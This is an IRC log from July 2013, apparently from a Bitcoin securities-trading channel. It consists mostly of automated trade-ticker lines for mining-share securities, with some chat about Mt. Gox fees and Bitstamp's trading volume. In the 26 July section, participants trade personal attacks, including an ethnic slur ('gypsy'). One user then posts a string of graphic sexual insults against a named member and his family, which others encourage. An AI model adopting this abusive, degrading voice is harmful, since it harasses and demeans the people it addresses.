[SDSTM] 1 @ 0.0105 BTC [+] Jul 25 13:16:54 [BTCTC] [ASICMINER-PT] 1 @ 4.76 BTC [-] Jul 25 13:16:56 [BTCTC] [ASICMINER-PT] 6 @ 4.75 = 28.5 BTC [-] Jul 25 13:17:28 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [-] Jul 25 13:18:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.04599 = 0.3679 BTC [+] Jul 25 13:18:25 [BTCTC] [TAT.ASICMINER] 21 @ 0.04599 = 0.9658 BTC [+] Jul 25 13:18:51 [BTCTC] [ASICMINER-PT] 1 @ 4.75 BTC [-] Jul 25 13:19:08 [HAVELOCK] [SMG] 607 @ 0.00026999 = 0.1639 BTC [-] Jul 25 13:19:20 [BTCTC] [ASICMINER-PT] 2 @ 4.748 = 9.496 BTC [-] Jul 25 13:20:25 [BTCTC] [BASIC-MINING] 10 @ 0.393 = 3.93 BTC [-] Jul 25 13:20:27 [BTCTC] [BASIC-MINING] 10 @ 0.392 = 3.92 BTC [-] Jul 25 13:21:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.04598 = 0.3678 BTC [-] Jul 25 13:21:23 [BTCTC] [ASICMINER-PT] 1 @ 4.655 BTC [-] Jul 25 13:21:39 [BTCTC] [ASICMINER-PT] 6 @ 4.655 = 27.93 BTC [-] Jul 25 13:21:41 [BTCTC] [ASICMINER-PT] 1 @ 4.65 BTC [-] Jul 25 13:21:58 [BTCTC] [ASICMINER-PT] 1 @ 4.602 BTC [-] Jul 25 13:23:11 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jul 25 13:23:40 [BTCTC] [AMC-PT] 800 @ 0.00361 = 2.888 BTC [-] Jul 25 13:24:16 [BTCTC] [AMC-PT] 420 @ 0.003603 = 1.5133 BTC [-] Jul 25 13:24:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.04599 = 0.3679 BTC [+] Jul 25 13:28:35 [BTCTC] [ASICMINER-PT] 8 @ 4.699 = 37.592 BTC [+] Jul 25 13:30:52 [BTCTC] [AMC-PT] 1000 @ 0.0036 = 3.6 BTC [-] Jul 25 13:32:00 [BTCTC] [AMC-PT] 145 @ 0.003601 = 0.5221 BTC [+] Jul 25 13:32:11 [BTCTC] [AMC-PT] 290 @ 0.0036 = 1.044 BTC [-] Jul 25 13:32:13 [BTCTC] [AMC-PT] 565 @ 0.003587 = 2.0267 BTC [-] Jul 25 13:33:15 [BTCTC] [AMC-PT] 16 @ 0.003587 = 0.0574 BTC [-] Jul 25 13:33:18 [BTCTC] [AMC-PT] 837 @ 0.003586 = 3.0015 BTC [-] Jul 25 13:33:24 [BTCTC] [AMC-PT] 147 @ 0.003585 = 0.527 BTC [-] Jul 25 13:34:07 [BTCTC] [AMC-PT] 178 @ 0.003585 = 0.6381 BTC [-] Jul 25 13:34:09 [BTCTC] [AMC-PT] 500 @ 0.00357 = 1.785 BTC [-] Jul 25 13:34:12 [BTCTC] [AMC-PT] 208 @ 0.00356 = 0.7405 BTC [-] Jul 25 13:34:14 [BTCTC] [AMC-PT] 123 @ 0.00351 = 0.4317 BTC [-] Jul 25 13:34:55 [BTCTC] [TAT.ASICMINER] 5 @ 0.04599 = 0.23 BTC [+] Jul 25 13:36:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.04599 BTC [+] Jul 25 13:39:34 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.003004 = 0.2974 BTC [-] Jul 25 13:46:50 [BTCTC] [TAT.ASICMINER] 30 @ 0.04331 = 1.2993 BTC [-] Jul 25 13:48:23 [BTCTC] [S.BBET-PT] 1 @ 0.001921 BTC [-] Jul 25 13:49:21 [BTCTC] [GSDPT] 5 @ 0.003388 = 0.0169 BTC [-] Jul 25 13:50:00 [BTCTC] [AMC-PT] 70 @ 0.003521 = 0.2465 BTC [+] Jul 25 13:59:48 [BTCTC] [BASIC-MINING] 1 @ 0.4297 BTC [+] Jul 25 13:59:50 [BTCTC] [BASIC-MINING] 3 @ 0.4297 = 1.2891 BTC [+] Jul 25 13:59:51 [BTCTC] [BASIC-MINING] 10 @ 0.4299 = 4.299 BTC [+] Jul 25 13:59:53 [BTCTC] [BASIC-MINING] 10 @ 0.43 = 4.3 BTC [+] Jul 25 14:01:00 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [-] Jul 25 14:01:02 [BTCTC] [ASICMINER-PT] 12 @ 4.58 = 54.96 BTC [-] Jul 25 14:07:06 [BTCTC] [BFMINES] 443 @ 0.003201 = 1.418 BTC [+] Jul 25 14:07:21 [MPEX] [S.MPOE] 8950 @ 0.00080743 = 7.2265 BTC [+] Jul 25 14:07:57 [BTCTC] [BFMINES] 47 @ 0.003699 = 0.1739 BTC [+] Jul 25 14:15:42 [BTCTC] [BASIC-MINING] 7 @ 0.44 = 3.08 BTC [+] Jul 25 14:15:44 [BTCTC] [BASIC-MINING] 5 @ 0.45 = 2.25 BTC [+] Jul 25 14:15:46 [BTCTC] [BASIC-MINING] 3 @ 0.4799 = 1.4397 BTC [+] Jul 25 14:15:47 [BTCTC] [BASIC-MINING] 3 @ 0.48 = 1.44 BTC [+] Jul 25 14:15:49 [BTCTC] [BASIC-MINING] 1 @ 0.497 BTC [+] Jul 25 14:15:49 [BTCTC] [BASIC-MINING] 2 @ 0.4979 = 0.9958 BTC [+] Jul 25 14:15:50 [BTCTC] [BASIC-MINING] 4 @ 0.498 = 1.992 BTC [+] Jul 25 14:15:52 [BTCTC] [BASIC-MINING] 1 @ 0.4984 BTC [+] Jul 25 14:15:53 [BTCTC] [BASIC-MINING] 1 @ 0.4985 BTC [+] Jul 25 14:15:55 [BTCTC] [BASIC-MINING] 2 @ 0.4985 = 0.997 BTC [+] Jul 25 14:15:56 [BTCTC] [BASIC-MINING] 3 @ 0.499 = 1.497 BTC [+] Jul 25 14:18:32 [HAVELOCK] [AM100] 30 @ 0.043 = 1.29 BTC [-] Jul 25 14:18:55 [HAVELOCK] [HIM] 6 @ 0.22 = 1.32 BTC [-] Jul 25 14:19:21 [MPEX] [S.MPOE] 6485 @ 0.00081057 = 5.2565 BTC [+] Jul 25 14:21:03 [BTCTC] [AMC-PT] 90 @ 0.00369 = 0.3321 BTC [+] Jul 25 14:21:06 [BTCTC] [AMC-PT] 95 @ 0.003694 = 0.3509 BTC [+] Jul 25 14:21:06 [BTCTC] [AMC-PT] 100 @ 0.003697 = 0.3697 BTC [+] Jul 25 14:21:08 [BTCTC] [AMC-PT] 100 @ 0.003699 = 0.3699 BTC [+] Jul 25 14:21:09 [BTCTC] [AMC-PT] 200 @ 0.0037 = 0.74 BTC [+] Jul 25 14:21:11 [BTCTC] [AMC-PT] 100 @ 0.003713 = 0.3713 BTC [+] Jul 25 14:21:13 [BTCTC] [AMC-PT] 125 @ 0.00368 = 0.46 BTC [-] Jul 25 14:21:16 [BTCTC] [AMC-PT] 65 @ 0.003719 = 0.2417 BTC [+] Jul 25 14:22:28 [BTCTC] [AMC-PT] 255 @ 0.003655 = 0.932 BTC [-] Jul 25 14:22:31 [BTCTC] [AMC-PT] 85 @ 0.003719 = 0.3161 BTC [+] Jul 25 14:22:32 [BTCTC] [AMC-PT] 35 @ 0.00372 = 0.1302 BTC [+] Jul 25 14:24:38 [BTCTC] [AMC-PT] 98 @ 0.00369 = 0.3616 BTC [-] Jul 25 14:28:08 [BTCTC] [B.YABMC] 7 @ 0.002644 = 0.0185 BTC [-] Jul 25 14:28:10 [BTCTC] [B.YABMC] 1 @ 0.002392 BTC [-] Jul 25 14:28:12 [BTCTC] [B.YABMC] 5 @ 0.002332 = 0.0117 BTC [-] Jul 25 14:28:14 [BTCTC] [B.YABMC] 6 @ 0.002331 = 0.014 BTC [-] Jul 25 14:30:05 [BTCTC] [S.MPOE-PT] 2 @ 0.000945 = 0.0019 BTC [+] Jul 25 14:31:31 [BTCTC] [ASICMINER-PT] 1 @ 4.456 BTC [-] Jul 25 14:31:31 [BTCTC] [ASICMINER-PT] 2 @ 4.455 = 8.91 BTC [-] Jul 25 14:31:31 [BTCTC] [ASICMINER-PT] 1 @ 4.451 BTC [-] Jul 25 14:34:27 [BTCTC] [AMC-PT] 1 @ 0.003719 BTC [+] Jul 25 14:36:08 [BTCTC] [KENILWORTH] 100 @ 0.0018 = 0.18 BTC [-] Jul 25 14:41:28 [BTCTC] [TAT.ASICMINER] 7 @ 0.04596 = 0.3217 BTC [+] Jul 25 14:42:25 [BTCTC] [BASIC-MINING] 1 @ 0.4899 BTC [-] Jul 25 14:42:51 [BTCTC] [BITVPS] 1 @ 0.001749 BTC [-] Jul 25 14:44:42 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Jul 25 14:47:58 [HAVELOCK] [AM100] 2 @ 0.04345 = 0.0869 BTC [+] Jul 25 14:49:27 [BTCTC] [BASIC-MINING] 1 @ 0.4799 BTC [-] Jul 25 14:51:01 [BTCTC] [BASIC-MINING] 4 @ 0.48 = 1.92 BTC [+] Jul 25 14:53:27 [BTCTC] [BITVPS] 250 @ 0.001758 = 0.4395 BTC [+] Jul 25 14:53:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.044 BTC [-] Jul 25 15:00:42 [BTCTC] [BASIC-MINING] 1 @ 0.4798 BTC [-] Jul 25 15:00:43 [BTCTC] [BASIC-MINING] 3 @ 0.4799 = 1.4397 BTC [+] Jul 25 15:00:45 [BTCTC] [BASIC-MINING] 12 @ 0.48 = 5.76 BTC [+] Jul 25 15:00:47 [BTCTC] [BASIC-MINING] 1 @ 0.4899 BTC [+] Jul 25 15:00:52 [BTCTC] [BASIC-MINING] 17 @ 0.49 = 8.33 BTC [+] Jul 25 15:01:07 [BTCTC] [DMS.SELLING] 2 @ 0.01999 = 0.04 BTC [-] Jul 25 15:02:32 [BTCTC] [BASIC-MINING] 1 @ 0.49 BTC [+] Jul 25 15:04:26 [BTCTC] [TAT.ASICMINER] 3 @ 0.04398 = 0.1319 BTC [-] Jul 25 15:13:03 [BTCTC] [TAT.ASICMINER] 8 @ 0.04396 = 0.3517 BTC [-] Jul 25 15:17:54 [HAVELOCK] [AM100] 3 @ 0.04345 = 0.1304 BTC [+] Jul 25 15:18:03 [HAVELOCK] [AM100] 10 @ 0.043499 = 0.435 BTC [+] Jul 25 15:18:13 [BTCTC] [KENILWORTH] 2 @ 0.0018 = 0.0036 BTC [-] Jul 25 15:18:15 [HAVELOCK] [AM100] 18 @ 0.0435 = 0.783 BTC [+] Jul 25 15:18:29 [HAVELOCK] [AM100] 14 @ 0.04359989 = 0.6104 BTC [+] Jul 25 15:20:07 [BTCTC] [DMS.MINING] 11 @ 0.01251 = 0.1376 BTC [-] Jul 25 15:21:52 [BTCTC] [AMC-PT] 29 @ 0.003591 = 0.1041 BTC [-] Jul 25 15:22:09 [BTCTC] [KENILWORTH] 75 @ 0.0018 = 0.135 BTC [-] Jul 25 15:23:32 [HAVELOCK] [AM100] 12 @ 0.0426607 = 0.5119 BTC [-] Jul 25 15:28:52 [BTCTC] [DMS.MINING] 7 @ 0.01251 = 0.0876 BTC [-] Jul 25 15:29:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.04397 = 0.1319 BTC [+] Jul 25 15:31:36 [BTCTC] [KENILWORTH] 50 @ 0.0018 = 0.09 BTC [-] Jul 25 15:45:29 [BTCTC] [AMC-PT] 31 @ 0.003648 = 0.1131 BTC [+] Jul 25 15:48:21 [BTCTC] [KENILWORTH] 50 @ 0.0018 = 0.09 BTC [-] Jul 25 15:48:55 [BTCTC] [KENILWORTH] 25 @ 0.0018 = 0.045 BTC [-] Jul 25 15:50:06 [BTCTC] [KENILWORTH] 8 @ 0.0018 = 0.0144 BTC [-] Jul 25 15:51:09 [BTCTC] [BASIC-MINING] 2 @ 0.49 = 0.98 BTC [+] Jul 25 15:55:55 [HAVELOCK] [SMG] 1 @ 0.00027999 BTC [+] Jul 25 15:56:59 [BTCTC] [GSDPT] 1 @ 0.00345 BTC [+] Jul 25 16:01:02 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 25 16:02:26 [HAVELOCK] [AM100] 3 @ 0.04359989 = 0.1308 BTC [+] Jul 25 16:03:54 [BTCTC] [BASIC-MINING] 1 @ 0.4996 BTC [+] Jul 25 16:03:56 [BTCTC] [BASIC-MINING] 1 @ 0.4997 BTC [+] Jul 25 16:03:57 [BTCTC] [BASIC-MINING] 2 @ 0.4997 = 0.9994 BTC [+] Jul 25 16:03:59 [BTCTC] [BASIC-MINING] 2 @ 0.4999 = 0.9998 BTC [+] Jul 25 16:04:00 [BTCTC] [BASIC-MINING] 10 @ 0.5 = 5 BTC [+] Jul 25 16:04:00 [BTCTC] [BASIC-MINING] 1 @ 0.5349 BTC [+] Jul 25 16:04:02 [BTCTC] [BASIC-MINING] 2 @ 0.535 = 1.07 BTC [+] Jul 25 16:04:03 [BTCTC] [BASIC-MINING] 1 @ 0.5359 BTC [+] Jul 25 16:04:05 [BTCTC] [BASIC-MINING] 2 @ 0.536 = 1.072 BTC [+] Jul 25 16:04:06 [BTCTC] [BASIC-MINING] 15 @ 0.538 = 8.07 BTC [+] Jul 25 16:04:07 [BTCTC] [BASIC-MINING] 4 @ 0.5381 = 2.1524 BTC [+] Jul 25 16:04:09 [BTCTC] [BASIC-MINING] 48 @ 0.5383 = 25.8384 BTC [+] Jul 25 16:04:27 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003176 = 0.0794 BTC [+] Jul 25 16:04:36 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.003177 = 0.3177 BTC [+] Jul 25 16:06:04 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 25 16:06:04 [BTCTC] [AMC-PT] 6 @ 0.003644 = 0.0219 BTC [-] Jul 25 16:06:27 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.003008 = 0.0752 BTC [-] Jul 25 16:06:39 [BTCTC] [AMC-PT] 55 @ 0.003645 = 0.2005 BTC [+] Jul 25 16:06:39 [BTCTC] [AMC-PT] 125 @ 0.00369 = 0.4613 BTC [+] Jul 25 16:06:43 [BTCTC] [AMC-PT] 6 @ 0.003644 = 0.0219 BTC [-] Jul 25 16:07:02 [BTCTC] [RSM] 10 @ 0.0146 = 0.146 BTC [-] Jul 25 16:07:02 [BTCTC] [RSM] 10 @ 0.0146 = 0.146 BTC [-] Jul 25 16:07:04 [BTCTC] [RSM] 29 @ 0.0145 = 0.4205 BTC [-] Jul 25 16:07:06 [BTCTC] [RSM] 20 @ 0.014261 = 0.2852 BTC [-] Jul 25 16:08:34 [BTCTC] [AMC-PT] 250 @ 0.003689 = 0.9223 BTC [+] Jul 25 16:09:23 [HAVELOCK] [VTX] 3 @ 0.5151 = 1.5453 BTC [-] Jul 25 16:09:26 [HAVELOCK] [VTX] 2 @ 0.515 = 1.03 BTC [-] Jul 25 16:09:28 [HAVELOCK] [VTX] 2 @ 0.51 = 1.02 BTC [-] Jul 25 16:10:53 [HAVELOCK] [HIM] 1 @ 0.22 BTC [-] Jul 25 16:12:16 [BTCTC] [DMS.MINING] 80 @ 0.0135 = 1.08 BTC [+] Jul 25 16:13:07 [BTCTC] [TAT.ASICMINER] 1 @ 0.04389 BTC [-] Jul 25 16:13:58 [BTCTC] [DMS.MINING] 120 @ 0.01354 = 1.6248 BTC [+] Jul 25 16:14:39 [BTCTC] [ASICMINER-PT] 1 @ 4.6 BTC [+] Jul 25 16:16:41 [BTCTC] [KENILWORTH] 20 @ 0.0018 = 0.036 BTC [-] Jul 25 16:18:58 [BTCTC] [BASIC-MINING] 2 @ 0.5384 = 1.0768 BTC [+] Jul 25 16:21:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.04388 = 0.1316 BTC [-] Jul 25 16:21:22 [BTCTC] [TAT.ASICMINER] 50 @ 0.04388 = 2.194 BTC [-] Jul 25 16:22:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.04399 = 0.22 BTC [+] Jul 25 16:22:26 [BTCTC] [AMC-PT] 668 @ 0.003604 = 2.4075 BTC [-] Jul 25 16:22:28 [BTCTC] [AMC-PT] 90 @ 0.003603 = 0.3243 BTC [-] Jul 25 16:22:30 [BTCTC] [AMC-PT] 442 @ 0.0036 = 1.5912 BTC [-] Jul 25 16:22:37 [BTCTC] [TAT.ASICMINER] 66 @ 0.044 = 2.904 BTC [+] Jul 25 16:23:50 [BTCTC] [BITVPS] 125 @ 0.001987 = 0.2484 BTC [+] Jul 25 16:25:21 [BTCTC] [DMS.SELLING] 22 @ 0.01851 = 0.4072 BTC [-] Jul 25 16:25:22 [BTCTC] [TAT.ASICMINER] 37 @ 0.04599 = 1.7016 BTC [+] Jul 25 16:25:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.04599 = 2.2995 BTC [+] Jul 25 16:26:21 [BTCTC] [TAT.ASICMINER] 8 @ 0.0467 = 0.3736 BTC [+] Jul 25 16:26:30 [BTCTC] [AMC-PT] 10 @ 0.0036 = 0.036 BTC [-] Jul 25 16:27:29 [BTCTC] [TAT.MINIGAME] 90 @ 0.0002725 = 0.0245 BTC [-] Jul 25 16:30:59 [HAVELOCK] [SDSTM] 1 @ 0.01039 BTC [-] Jul 25 16:32:57 [BTCTC] [TAT.ASICMINER] 10 @ 0.0467 = 0.467 BTC [+] Jul 25 16:35:52 [BTCTC] [COGNITIVE] 14 @ 0.6274 = 8.7836 BTC [-] Jul 25 16:35:54 [BTCTC] [COGNITIVE] 15 @ 0.6275 = 9.4125 BTC [+] Jul 25 16:35:55 [BTCTC] [COGNITIVE] 14 @ 0.6398 = 8.9572 BTC [+] Jul 25 16:35:57 [BTCTC] [COGNITIVE] 15 @ 0.64 = 9.6 BTC [+] Jul 25 16:36:05 [MPEX] [S.MPOE] 10850 @ 0.00086716 = 9.4087 BTC [+] Jul 25 16:36:33 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.003008 = 0.012 BTC [-] Jul 25 16:38:25 [BTCTC] [COGNITIVE] 1 @ 0.6436 BTC [+] Jul 25 16:38:27 [BTCTC] [COGNITIVE] 1 @ 0.6446 BTC [+] Jul 25 16:38:29 [BTCTC] [COGNITIVE] 1 @ 0.647 BTC [+] Jul 25 16:39:36 [BTCTC] [COGNITIVE] 3 @ 0.67 = 2.01 BTC [+] Jul 25 16:41:19 [HAVELOCK] [AM100] 3 @ 0.0435 = 0.1305 BTC [-] Jul 25 16:42:03 [BTCTC] [DMS.MINING] 2 @ 0.0135 = 0.027 BTC [-] Jul 25 16:43:15 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [-] Jul 25 16:47:20 [BTCTC] [AMC-PT] 2000 @ 0.003602 = 7.204 BTC [+] Jul 25 16:47:22 [BTCTC] [AMC-PT] 118 @ 0.003602 = 0.425 BTC [+] Jul 25 16:47:48 [BTCTC] [AMC-PT] 882 @ 0.003601 = 3.1761 BTC [-] Jul 25 16:50:44 [BTCTC] [KENILWORTH] 116 @ 0.0018 = 0.2088 BTC [-] Jul 25 16:52:27 [BTCTC] [BMF] 1 @ 0.0322 BTC [+] Jul 25 16:53:08 [BTCTC] [COGNITIVE] 3 @ 0.647 = 1.941 BTC [-] Jul 25 16:53:20 [BTCTC] [AMC-PT] 8 @ 0.003602 = 0.0288 BTC [+] Jul 25 16:53:22 [BTCTC] [AMC-PT] 492 @ 0.003601 = 1.7717 BTC [-] Jul 25 16:53:51 [HAVELOCK] [AM100] 5 @ 0.043 = 0.215 BTC [-] Jul 25 16:55:19 [BTCTC] [COGNITIVE] 1 @ 0.6799 BTC [+] Jul 25 16:55:21 [BTCTC] [COGNITIVE] 1 @ 0.68 BTC [+] Jul 25 16:55:48 [BTCTC] [BTC-BOND] 50 @ 0.00996 = 0.498 BTC [-] Jul 25 16:56:49 [BTCTC] [ASICMINER-PT] 2 @ 4.634 = 9.268 BTC [+] Jul 25 16:56:52 [BTCTC] [DMS.MINING] 38 @ 0.0135 = 0.513 BTC [-] Jul 25 16:58:57 [HAVELOCK] [AM100] 50 @ 0.043 = 2.15 BTC [-] Jul 25 17:00:32 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [+] Jul 25 17:00:35 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [+] Jul 25 17:00:41 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [+] Jul 25 17:00:55 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [+] Jul 25 17:01:02 [HAVELOCK] [AM100] 5 @ 0.0435 = 0.2175 BTC [+] Jul 25 17:01:27 [HAVELOCK] [AM100] 1 @ 0.0435 BTC [+] Jul 25 17:01:46 [HAVELOCK] [AM100] 36 @ 0.0435 = 1.566 BTC [+] Jul 25 17:03:02 [BTCTC] [AMC-PT] 8626 @ 0.003601 = 31.0622 BTC [-] Jul 25 17:04:13 [HAVELOCK] [AM100] 14 @ 0.0435 = 0.609 BTC [+] Jul 25 17:09:13 https://bitcointalk.org/index.php?topic=261376.msg2801939#msg2801939 Jul 25 17:09:16 kinda lulzy. Jul 25 17:09:25 Atlas ATS Exchange: free membership campaign Jul 25 17:10:13 dub https://bitcointalk.org/index.php?topic=261465.msg2801392#msg2801392 Jul 25 17:11:03 [HAVELOCK] [SDSTM] 1 @ 0.01039 BTC [-] Jul 25 17:11:58 [HAVELOCK] [VTX] 1 @ 0.585 BTC [+] Jul 25 17:12:20 [HAVELOCK] [AM100] 50 @ 0.04359 = 2.1795 BTC [+] Jul 25 17:14:01 [BTCTC] [DMS.MINING] 1 @ 0.0135 BTC [-] Jul 25 17:14:15 [HAVELOCK] [SDSTM] 9 @ 0.01039 = 0.0935 BTC [-] Jul 25 17:14:16 thanks mp Jul 25 17:14:18 [BTCTC] [TAT.ASICMINER] 13 @ 0.04669 = 0.607 BTC [-] Jul 25 17:14:20 mtgox fees are insane Jul 25 17:14:36 might actually back it because why the fuck not Jul 25 17:14:37 Glad I dont bother with them Jul 25 17:15:00 taub do yourself a favour trade otc. Jul 25 17:15:04 there's so many options now. Jul 25 17:16:24 speaking of exchanges Jul 25 17:16:33 kids with css skills surpased gox or some shit Jul 25 17:16:58 http://www.coindesk.com/bitstamp-bitcoin-trading-volume-overtakes-mt-gox-for-first-time/ Jul 25 17:17:00 not so hard to do. Jul 25 17:17:00 Bitstamp bitcoin trading volume overtakes Mt. Gox for first time Jul 25 17:17:07 lol Jul 25 17:17:13 doesnt work for short term speculation Jul 25 17:17:17 which is what i do Jul 25 17:17:49 kakobrekla https://twitter.com/Mircea_Popescu/status/360403452913926147 Jul 25 17:18:01 Bitstamp bitcoin trading volume overtakes Mt. Gox for first time Jul 25 17:18:03 nice! Jul 25 17:18:05 nothing is quite as exquisitely enjoyable as humiliating those who thought themselves colossal Jul 25 17:18:10 taub how is this nice Jul 25 17:18:17 [HAVELOCK] [SDSTM] 3 @ 0.01039 = 0.0312 BTC [-] Jul 25 17:18:20 might lead mtgox to step up their game Jul 25 17:18:26 [BTCTC] [AMC-PT] 15 @ 0.003681 = 0.0552 BTC [+] Jul 25 17:18:41 taub this is a comedy not drama Jul 25 17:19:19 what you mean Jul 25 17:19:35 if it was drama they would step up Jul 25 17:19:44 oh Jul 25 17:20:17 anyway, people are so desperate they will use that piece of shit that bitstamp is Jul 25 17:20:24 is all Jul 25 17:20:37 i bought all my initial bitcoins there Jul 25 17:20:40 it's alright Jul 25 17:21:21 its not alright. Jul 25 17:21:37 its allwrong. Jul 25 17:21:58 [BTCTC] [S.MPOE-PT] 9 @ 0.00085 = 0.0077 BTC [-] Jul 25 17:22:02 [BTCTC] [S.MPOE-PT] 75 @ 0.0008351 = 0.0626 BTC [-] Jul 25 17:22:04 [BTCTC] [S.MPOE-PT] 636 @ 0.000835 = 0.5311 BTC [-] Jul 25 17:22:06 [BTCTC] [S.MPOE-PT] 480 @ 0.000835 = 0.4008 BTC [-] **** BEGIN LOGGING AT Fri Jul 26 00:30:16 2013 Jul 26 00:30:38 usagi: there is countless threads of your shady behavior all over the forum Jul 26 00:30:53 your always trying to sell something, borrow bitcoins etc. Jul 26 00:31:33 seriously, tiberiousii say something nice. Maybe about Mother Theresa. You like her don't you? Jul 26 00:31:52 i don't like mother theresa. first she never had kids Jul 26 00:31:59 second she never showed her tits. Jul 26 00:32:01 sky_king: pikers not allowed to have an opinion. Jul 26 00:32:02 what a wasted life. Jul 26 00:32:16 lol the pervert boiler room operator gypsy strolls in Jul 26 00:32:31 with the fake name popescu which is like a smith in romania Jul 26 00:32:33 tiberiusii!*@* added to ignore list. Jul 26 00:32:55 [HAVELOCK] [SDSTM] 3 @ 0.00932 = 0.028 BTC [+] Jul 26 00:33:46 [BTCTC] [BASIC-MINING] 1 @ 0.499 BTC [-] Jul 26 00:34:01 [HAVELOCK] [SDSTM] 2 @ 0.00931 = 0.0186 BTC [-] Jul 26 00:34:12 [HAVELOCK] [HIM] 2 @ 0.21999 = 0.44 BTC [+] Jul 26 00:37:25 [HAVELOCK] [HIM] 10 @ 0.151 = 1.51 BTC [-] Jul 26 00:40:40 [HAVELOCK] [SDSTM] 20 @ 0.0105 = 0.21 BTC [+] Jul 26 00:40:49 [HAVELOCK] [SDSTM] 20 @ 0.0105 = 0.21 BTC [+] Jul 26 00:41:33 [HAVELOCK] [AM100] 10 @ 0.0436999 = 0.437 BTC [+] Jul 26 00:41:59 [BTCTC] [AMC-PT] 800 @ 0.003799 = 3.0392 BTC [-] Jul 26 00:42:12 tiberiusii , I blew a huge load on your moms ass last night Jul 26 00:42:49 Then your granny Jul 26 00:43:11 I teabagged her after Jul 26 00:43:14 no love for daddy? Jul 26 00:43:18 heh Jul 26 00:43:29 I had dad lick my asshole Jul 26 00:43:47 they said Tiberius is a dissapointment Jul 26 00:44:33 All he knows how to do is suck balls and troll Jul 26 00:44:41 he is no good at either, I can tell you Jul 26 00:47:35 tiberiusii , so I heard you went to comic-con and paid for some nerds to dress up like Star Trek and ass rape you Jul 26 00:47:55 Damn Jul 26 00:48:05 ^ hahaha Jul 26 00:48:06 spock blew a load of green jizz in your mouth Jul 26 00:48:14 :/ Jul 26 00:48:18 "it's him again", right? ^^ Jul 26 00:48:19 it is on youtube Jul 26 00:48:23 Poor spock Jul 26 00:49:25 you wanted a reach around and Kirk told you to fuck off Jul 26 00:49:34 now you are angry and troll Jul 26 00:50:33 [HAVELOCK] [HIM] 100 @ 0.151 = 15.1 BTC [-] Jul 26 00:51:00 i need a degree in cryptography just to comprehend wtf people are talking about in this chan anymore Jul 26 00:53:42 [HAVELOCK] [HIM] 40 @ 0.1501 = 6.004 BTC [-] Jul 26 00:54:17 [HAVELOCK] [AM100] 1 @ 0.04369989 BTC [-] Jul 26 00:57:35 [HAVELOCK] [HIM] 3 @ 0.16 = 0.48 BTC [+] Jul 26 00:57:48 [HAVELOCK] [HIM] 1 @ 0.16 BTC [+] Jul 26 00:58:44 [HAVELOCK] [HIM] 1 @ 0.16 BTC [+] Jul 26 00:58:49 [BTCTC] [ASICMINER-PT] 1 @ 4.702 BTC [-] Jul 26 00:58:51 [BTCTC] [ASICMINER-PT] 1 @ 4.702 BTC [-] Jul 26 00:59:24 [BTCTC] [GSDPT] 5 @ 0.00348 = 0.0174 BTC [+] Jul 26 01:01:23 [BTCTC] [ASICMINER-PT] 1 @ 4.697 BTC [-] Jul 26 01:02:05 [BTCTC] [TAT.ASICMINER] 43 @ 0.04501 = 1.9354 BTC [-] Jul 26 01:02:35 [BTCTC] [ASICMINER-PT] 2 @ 4.697 = 9.394 BTC [-] Jul 26 01:04:50 [BTCTC] [DMS.SELLING] 150 @ 0.0187 = 2.805 BTC [-] Jul 26 01:04:55 [HAVELOCK] [HIM] 1 @ 0.151 BTC [-] Jul 26 01:05:04 [HAVELOCK] [HIM] 168 @ 0.150001 = 25.2002 BTC [-] Jul 26 01:07:59 [BTCTC] [AMC-PT] 118 @ 0.003721 = 0.4391 BTC [-] Jul 26 01:08:00 [BTCTC] [AMC-PT] 185 @ 0.00372 = 0.6882 BTC [-] Jul 26 01:08:01 [BTCTC] [AMC-PT] 52 @ 0.00372 = 0.1934 BTC [-] Jul 26 01:08:32 [BTCTC] [AMC-PT] 1 @ 0.0037 BTC [-] Jul 26 01:09:11 [BTCTC] [AMC-PT] 345 @ 0.0037 = 1.2765 BTC [-] Jul 26 01:09:45 [BTCTC] [ASICMINER-PT] 1 @ 4.697 BTC [-] Jul 26 01:09:47 [BTCTC] [ASICMINER-PT] 10 @ 4.695 = 46.95 BTC [-] Jul 26 01:11:01 [HAVELOCK] [SMG] 400 @ 0.00027 = 0.108 BTC [+] Jul 26 01:11:06 [BTCTC] [AMC-PT] 1000 @ 0.003667 = 3.667 BTC [-] Jul 26 01:11:08 [BTCTC] [AMC-PT] 195 @ 0.003665 = 0.7147 BTC [-] Jul 26 01:11:10 [BTCTC] [AMC-PT] 35 @ 0.003661 = 0.1281 BTC [-] Jul 26 01:11:11 [BTCTC] [AMC-PT] 70 @ 0.00366 = 0.2562 BTC [-] Jul 26 01:11:14 [BTCTC] [AMC-PT] 25 @ 0.003656 = 0.0914 BTC [-] Jul 26 01:11:15 [BTCTC] [AMC-PT] 65 @ 0.003656 = 0.2376 BTC [-] Jul 26 01:11:17 [BTCTC] [AMC-PT] 10 @ 0.003655 = 0.0366 BTC [-] Jul 26 01:12:48 you know you're looking at a winning corporate culture when they guy telling a largish audience that 15% will lose thier jobs gets applause at the end on it Jul 26 01:12:58 Who? Jul 26 01:13:27 [BTCTC] [TAT.ASICMINER] 83 @ 0.045 = 3.735 BTC [-] Jul 26 01:13:29 [BTCTC] [TAT.ASICMINER] 4 @ 0.045 = 0.18 BTC [-] Jul 26 01:13:31 [BTCTC] [TAT.ASICMINER] 17 @ 0.0446 = 0.7582 BTC [-] Jul 26 01:14:47 